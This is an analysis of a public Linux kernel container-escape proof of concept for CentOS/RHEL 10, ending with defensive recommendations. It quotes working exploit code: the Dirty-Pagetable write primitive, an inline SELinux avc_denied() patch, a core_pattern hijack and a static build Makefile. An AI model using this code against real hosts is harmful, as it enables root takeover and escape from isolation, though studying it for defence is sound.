Executive Summary
ipv6_frag_escape is a public proof-of-concept Linux local privilege escalation and container escape targeting CentOS Stream 10 and RHEL 10 running kernel 6.12.x. An unprivileged process inside a network-isolated container, with access to unprivileged user namespaces, can obtain an interactive root shell in the host’s initial namespaces and root filesystem. The root cause is an in-slab linear overflow inside __ip6_append_data() — fixed upstream by commit 38becddc with no CVE assigned — that yields one-byte control over the nr_frags field of a skb_shared_info structure appended to a packet’s head object.
The exploit converts that single controlled byte into a seven-step chain: in-slab overflow to page use-after-free, Dirty-Pagetable to gain arbitrary physical read/write, SMP-trampoline scan to defeat KASLR without any info-leak syscall, infinite self-referencing PTE window for unlimited kernel R/W, BTF-backed offset resolution to take credentials without any hardcoded offsets, inline avc_denied() patching to silence SELinux without touching the enforcing flag, and finally a core_pattern hijack to relay a root shell over a Unix socket. The PoC is reliable enough to prove the chain and deliberately omits per-CPU grooming and cross-cache SLUB hardening, scoping it to CentOS/RHEL 10 only.
Background: The Vulnerable Code Path
The bug lives in __ip6_append_data(), the function responsible for assembling outgoing IPv6 datagrams into socket buffer fragments. When sending a datagram that requires fragmentation, the kernel appends fragment data to the head socket buffer object. The skb_shared_info structure is allocated at the tail of this head object; its nr_frags field (one byte) controls how many entries in the frags[] array are walked by the teardown path skb_release_data(). The overflow allows a controlled write past the intended boundary, landing precisely on that nr_frags byte in an adjacent slab allocation.
The fragmentation path is reached by sending an oversized IPv6 UDP datagram with a Segment Routing Header extension through a loopback interface whose MTU has been artificially lowered. The trigger parameters below are tuned for the specific allocation geometry of kernel 6.12 on x86_64 with 64-byte SLUB cache alignment:
/* trigger parameters (unchanged from the original reproducer) */
#define EXP_NRFRAGS 1
#define EXP_NHOLD 8
#define EXP_PL1 576
#define EXP_NGROOM 64
#define EXP_EXTHDR 640
#define EXP_K 256
#define EXP_L2 8
#define PORT 12345
/* Per-run Unix socket inside the container's /tmp; the core_pattern helper (host root, init ns)
reaches it through /proc/<crash-pid>/root, the same chrooted fs the caller sees. The path
carries the caller pid so a stale root-owned socket from an earlier run cannot block our
bind (sticky /tmp), and the handler learns the exact path from its argv. No network. */
#define CORE_SOCK_FMT "/tmp/.core_sock_%d"
/* trampoline / phys-window scan bounds */
#define LOW_SCAN_LO 0x80000UL
#define LOW_SCAN_HI 0x9f000UL
#define TGT_LO 0x1000000UL
#define SLOT_BASE 40
#define SLOT_CAP 505
Source: IPV6_FRAG_ESCAPE.c — trigger parameters and socket path format. Source: original repository.
Exploitation Chain
Step 1 — In-Slab Overflow to a Self-UAF
The bug yields control of the single nr_frags byte in skb_shared_info. The free path (skb_release_data()) walks frags[0..nr_frags) and calls put_page() on each entry. Since frags[] is never initialised, the attacker pre-plants a struct page * for a pipe buffer page into the slab slot through controlled cache reuse, then sets nr_frags to 1. The teardown drops a reference on a page the attacker still owns, converting the linear overflow into a page use-after-free. Critically, the overflow never touches frags[0], so it need not be raced against the spray — this is the primary source of the exploit’s reliability.
Step 2 — Page UAF to Dirty-Pagetable Primitive
The freed pipe page is reclaimed as a last-level page table by faulting a fresh anonymous mapping. One physical page is now simultaneously a live leaf page table and a page the pipe can still read and write. Writing eight bytes to the pipe installs a forged PTE; reading the pipe reads the table back. This is a finite arbitrary physical read/write, capped at approximately 460 PTE windows per table. The win_selfref() function below is the core of this primitive — once the leaf page table maps itself at VR[g_selfslot], its 512 PTEs become plain memory and the window cap is lifted entirely, giving unlimited random-access kernel read/write with no pipe in the loop:
static volatile unsigned char *win_selfref(unsigned long pa)
{
if (g_wk < g_wk_lo || g_wk >= g_wk_hi) {
g_wk = g_wk_lo;
tlb_flush_full();
g_passes++;
}
int slot = g_wk++;
g_leaf_pte[slot] = (pa & ~0xfffUL) | g_fl; /* inject a present+rw leaf PTE for pa into leaf PT[slot] */
__asm__ __volatile__("mfence" ::: "memory"); /* drain the PTE store before the walker reads it */
tlb_flush_full(); /* invalidate the stale VR[slot] translation */
return (volatile unsigned char *)(g_vr + (unsigned long)slot * 4096) + (pa & 0xfffUL);
}
Source: IPV6_FRAG_ESCAPE.c — the dirty-pagetable write primitive. Source: original repository.
TLB coherence is handled from ring 3: since the exploit cannot issue INVLPG, it calls mprotect() over a range exceeding tlb_single_page_flush_ceiling, forcing the kernel to escalate to flush_tlb_mm — a full TLB flush of the current mm — without walking the leaf page table.
Step 3 — Defeating KASLR
With the physical read primitive active, the exploit scans the fixed low-memory SMP trampoline page table (between LOW_SCAN_LO = 0x80000 and LOW_SCAN_HI = 0x9f000 physical). KASLR never relocates the trampoline; its kernel-half page table entry points at level4_kernel_pgt, which is the kernel’s physical base address. From there, init_top_pgt — recognisable by its self-referencing entry at index 511 — acts as a universal virtual-to-physical translator, recovering the kernel virtual base and tying the attacker’s address space to physical memory. No kernel info-leak syscall is involved at any point.
Step 4 — Finite to Infinite Read/Write
Once KASLR is broken, the exploit forges one PTE in the leaf table that points at the table’s own physical address. The matching virtual window then aliases the page table itself, making every PTE a writable eight-byte slot: unlimited, random-access kernel read/write, with no pipe in the loop. Ring-3 TLB coherence is maintained by the same oversized mprotect()-based full-mm flush described in Step 2.
Step 5 — Resolve Offsets and Take Credentials
Struct member offsets are read at runtime from /sys/kernel/btf/vmlinux (present and world-readable on stock RHEL/CentOS), eliminating all hardcoded offsets. The exploit locates its own task_struct by walking the vmemmap struct page array and following mm_struct.owner. Symbol addresses come from an in-process kallsyms parser in the companion kallsysms.c translation unit that reads the kernel’s own symbol tables through the arbitrary-read primitive without any privilege and without CAP_SYSLOG. Only if that fails does it fall back to /proc/kallsyms. Once task_struct is located, the exploit zeros all user/group IDs in both cred and real_cred, fills every capability set to 0xffffffffffffffff, and points cred.user_ns at init_user_ns.
Step 6 — Disabling SELinux Without Flipping the Enforcing Flag
Silencing SELinux is a prerequisite for the final escape: the core-dump handler’s cross-domain re-exec would otherwise be denied. Rather than clearing the global enforcing flag (which getenforce would immediately expose), the exploit overwrites the prologue of avc_denied() with a three-byte xor eax, eax ; ret stub, stepping over the endbr64 prefix if Indirect Branch Tracking is active. Every access-vector denial in the process henceforth returns granted, while getenforce still reports Enforcing:
/* neuter SELinux MAC: avc_denied -> `xor eax,eax ; ret` (skipping endbr64 if present).
Best effort: an unconfined domain may lack avc_denied in kallsyms, in which case
this step is skipped. */
static void stub_mac(unsigned long avc_kva)
{
if ((avc_kva >> 48) != 0xffff) {
printf("[*] avc_denied not in kallsyms; skipping MAC stub (unconfined domain)\n");
fflush(stdout);
return;
}
unsigned long avc_pa = pm_kva2pa(avc_kva);
if (!avc_pa) {
return;
}
unsigned char prologue[4];
phys_read(avc_pa, prologue, 4);
int endbr = (prologue[0] == 0xf3 && prologue[1] == 0x0f && prologue[2] == 0x1e && prologue[3] == 0xfa) ? 4 : 0;
unsigned char stub[3] = { 0x31, 0xc0, 0xc3 }; /* xor eax,eax ; ret */
phys_write(avc_pa + (unsigned)endbr, stub, 3);
unsigned char check[3] = { 0, 0, 0 };
phys_read(avc_pa + (unsigned)endbr, check, 3);
int installed = (check[0] == 0x31 && check[1] == 0xc0 && check[2] == 0xc3);
printf("[*] avc_denied @0x%lx +%d: %02x %02x %02x -> %s\n", avc_pa, endbr,
check[0], check[1], check[2], installed ? "stub installed (MAC off)" : "stub FAILED");
fflush(stdout);
}
Source: IPV6_FRAG_ESCAPE.c — SELinux avc_denied() inline patch. Source: original repository.
Step 7 — Escape Through core_pattern
The global core_pattern kernel buffer is overwritten with a pipe-handler entry whose path is routed through /proc/%P/root — the crashing task’s container chroot, as seen from the kernel’s usermodehelper. The kernel runs the handler as root in the initial namespaces, bypassing all namespace isolation. An interactive root shell is relayed over a Unix socket bound inside the container; the handler is born inside the init namespaces so no in-place namespace surgery is required. The /proc/%P/root path trick means the handler resolves its own binary inside the container rootfs without needing to break out of the chroot:
/* write the kernel core_pattern buffer to a pipe handler the kernel runs as root in the INIT
namespaces on the next core dump. The handler path is routed through /proc/%P/root so it
resolves inside the crashing task's (container) filesystem, and the crash PID is passed as %P
so the handler can reach our socket at /proc/%P/root/tmp/.core_sock_. No namespace
surgery: the handler is a fresh kernel-spawned process already in the init namespaces. */
static int patch_core_pattern(unsigned long cp_kva)
{
char self[160];
ssize_t r = readlink("/proc/self/exe", self, sizeof self - 1);
if (r <= 0) {
printf("[!] readlink /proc/self/exe failed\n");
return -1;
}
self[r] = 0;
char pattern[256];
int n = snprintf(pattern, sizeof pattern, "|/proc/%%P/root%s --core %%P %s", self, g_core_sock);
if (n < 0 || n >= 128) { /* CORENAME_MAX_SIZE is 128 */
printf("[!] core_pattern too long (%d)\n", n);
return -1;
}
unsigned long cp_pa = pm_kva2pa(cp_kva);
if (!cp_pa) {
printf("[!] core_pattern translate failed\n");
return -1;
}
phys_write(cp_pa, pattern, (unsigned long)n + 1);
char check[256] = {0};
phys_read(cp_pa, check, (unsigned long)n + 1);
printf("[*] core_pattern set: %s\n", check);
fflush(stdout);
return strcmp(check, pattern) == 0 ? 0 : -1;
}
Source: IPV6_FRAG_ESCAPE.c — core_pattern overwrite and container escape relay. Source: original repository.
Scope, Requirements, and Tested Kernels
The exploit targets a specific intersection of kernel version, CPU features, and configuration defaults. The authors are explicit that this is a targeted proof of concept, not a turnkey weapon: per-CPU PCP grooming, cross-cache SLUB armoring, and quieter slab placement are all deliberately omitted. The reliability is sufficient to prove the chain; a fully armed variant is expected once a CVE is assigned.
CONFIG_INIT_ON_ALLOC_DEFAULT_ONmust be off — the RHEL/CentOS default. The PoC relies on stale pointer values in uninitialised slab bytes; withinit_on_alloc=1that slot is zeroed and the technique produces a NULL dereference crash instead of a working exploit.- 5-level paging (LA57) required. The page table walk is wired for five paging levels and a startup check refuses to run without it. A 4-level CPU would need the walk refactored.
/sys/kernel/btf/vmlinuxmust be present and world-readable — the stock configuration on RHEL/CentOS. This file provides runtime struct offsets, removing the need for any hardcoded values.
Tested Kernels
| Distro | Kernel | Result |
|---|---|---|
| CentOS Stream 10 | 6.12.0-242.el10 | root, container escape |
| RHEL 10 | 6.12.0-228.el10 | httpd_t context escape |
Building the PoC
The PoC must be compiled on the target or guest (x86-64 only, due to the inline mfence instruction). It is built as a fully static binary so it carries no shared-library dependencies, a requirement for running inside minimal container rootfs images such as Alpine or scratch-based containers via a bind mount:
# Build the offset-free CentOS-10 dirty-PT escape.
# x86_64 ONLY (inline `mfence`); build on the target/guest, not a cross-arch host.
CC ?= gcc
CFLAGS ?= -O2 -w
# static: the escape runs inside an arbitrary container rootfs (ubuntu/alpine/scratch) via a
# bind mount, so it must carry NO dynamic-loader / libc dependency.
LDFLAGS ?= -static
TARGET = IPV6_FRAG_ESCAPE
OBJS = IPV6_FRAG_ESCAPE.o pagemap.o kallsysms.o
$(TARGET): $(OBJS)
$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OBJS)
IPV6_FRAG_ESCAPE.o: IPV6_FRAG_ESCAPE.c pagemap.h
$(CC) $(CFLAGS) -c -o $@ IPV6_FRAG_ESCAPE.c
pagemap.o: pagemap.c pagemap.h
$(CC) $(CFLAGS) -c -o $@ pagemap.c
kallsysms.o: kallsysms.c
$(CC) $(CFLAGS) -c -o $@ kallsysms.c
clean:
rm -f $(OBJS) $(TARGET)
.PHONY: clean
Source: Makefile. Source: original repository.
Key Takeaways
- A single controlled byte — the
nr_fragsfield inskb_shared_info— is sufficient to bootstrap a full container escape, demonstrating that even narrow-width kernel overflows are highly exploitable when combined with Dirty-Pagetable techniques. - The Dirty-Pagetable primitive converts a page use-after-free into unlimited arbitrary physical read/write without ROP chains, heap sprays, or kernel code execution as an intermediate step.
- The SMP trampoline scan defeats KASLR without any info-leak syscall, relying purely on the physical read primitive and the fact that the trampoline page table is never relocated by KASLR.
- BTF-backed runtime offset resolution eliminates hardcoded struct offsets, making the exploit kernel-version agnostic within the 6.12.x family — a pattern increasingly common in modern kernel PoCs.
- The SELinux bypass via
avc_denied()prologue overwrite is invisible togetenforceand standard MAC monitoring tools, highlighting the limits of user-space SELinux visibility when kernel text is writable. - The
core_patternescape route requires no namespace surgery; the handler is spawned directly in the init namespaces by the kernel’s usermodehelper, avoiding the PID-namespace hazards of in-place namespace transitions. - The PoC is explicitly scoped: it does not cover kernels with
init_on_alloc=1, 4-level paging CPUs, or non-RHEL/CentOS 10 targets. A variant covering those configurations is expected once the CVE is public.
Defensive Recommendations
- Apply the upstream kernel fix immediately. Commit
38becddccloses the overflow in__ip6_append_data(). Ensure RHEL 10 / CentOS 10 systems are running an updated kernel that includes this patch. - Enable
init_on_alloc=1. SettingCONFIG_INIT_ON_ALLOC_DEFAULT_ON=y(or passinginit_on_alloc=1on the kernel command line) zeroes uninitialised slab bytes, neutralising this specific technique and a broad class of similar attacks. - Disable unprivileged user namespaces. The exploit requires user namespace access from inside the container. Setting
user.max_user_namespaces=0raises the bar significantly, though it may break some container runtimes. - Restrict
/sys/kernel/btf/vmlinux. World-readable BTF is a prerequisite for the offset-free technique. Tightening permissions to root-only forces fallback to less reliable methods, though it does not block the overflow itself. - Monitor
core_patternfor unexpected changes. Alert on any write to/proc/sys/kernel/core_patternthat introduces a|prefix or an unexpected binary path. Auditd rules on the sysctl write path are effective here. - Use seccomp profiles to restrict fragmented IPv6 socket operations in untrusted containers. Blocking
setsockopt(IPV6_MTU)andsetsockopt(IPV6_RTHDR)from container workloads removes the fragmentation trigger path entirely. - Audit kernel text integrity. The
avc_denied()prologue overwrite is not visible togetenforceorsestatus. Runtime integrity monitoring of kernel text sections — viaCONFIG_LOCK_DOWN_KERNELor a hypervisor-level checker — is required to detect this class of attack after the fact. - Consider kernel lockdown mode. Lockdown restricts several interfaces the exploit chain relies on and increases overall exploitation cost, even if it does not directly block the IPv6 overflow.
Conclusion
ipv6_frag_escape is a technically sophisticated container escape that chains seven distinct techniques — from a narrow in-slab overflow to credential takeover and SELinux silencing — into a reliable, offset-free primitive on CentOS/RHEL 10. It illustrates how a single-byte kernel write, combined with the Dirty-Pagetable strategy and BTF-backed runtime introspection, can produce an exploit that requires no hardcoded offsets, no ROP chains, and no user-visible MAC policy changes. Security teams running RHEL 10 or CentOS Stream 10 workloads in containerised environments should treat patching as a priority and review the defensive recommendations above regardless of current exposure.
Original text: “ipv6_frag_escape — Linux LPE / Reliable Container Escape PoC” by sgkdev on GitHub.

